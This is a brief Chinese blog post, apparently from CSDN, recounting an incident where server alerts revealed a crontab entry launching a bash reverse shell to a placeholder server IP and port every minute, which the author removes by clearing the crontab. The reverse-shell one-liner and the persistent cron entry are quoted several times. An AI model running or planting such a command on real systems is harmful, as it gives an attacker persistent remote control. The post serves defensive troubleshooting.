客户收到服务器告警,发现进程sh以异常参数启动,形如/bin/sh-cbash-i>&/dev/tcp/服务器IP/端口0>&1,表明存在Linux反弹shell行为。检查crontab日志发现相关记录,一分钟执行一次。为消除告警,清空了crontab配置。
客户今天持续收到服务器告警,给出了可以参数信息
检测说明:进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1,符合可疑进程参数的特性.
告警说明:Linux反弹shell行为
crontab -l发现有记录 * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1
cat /var/log/cron | grep /dev/tcp/服务器iP/端口 再去看cron日志,果然一分钟一次
crontab -e果断将里面的内容清空,到此告警消失
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
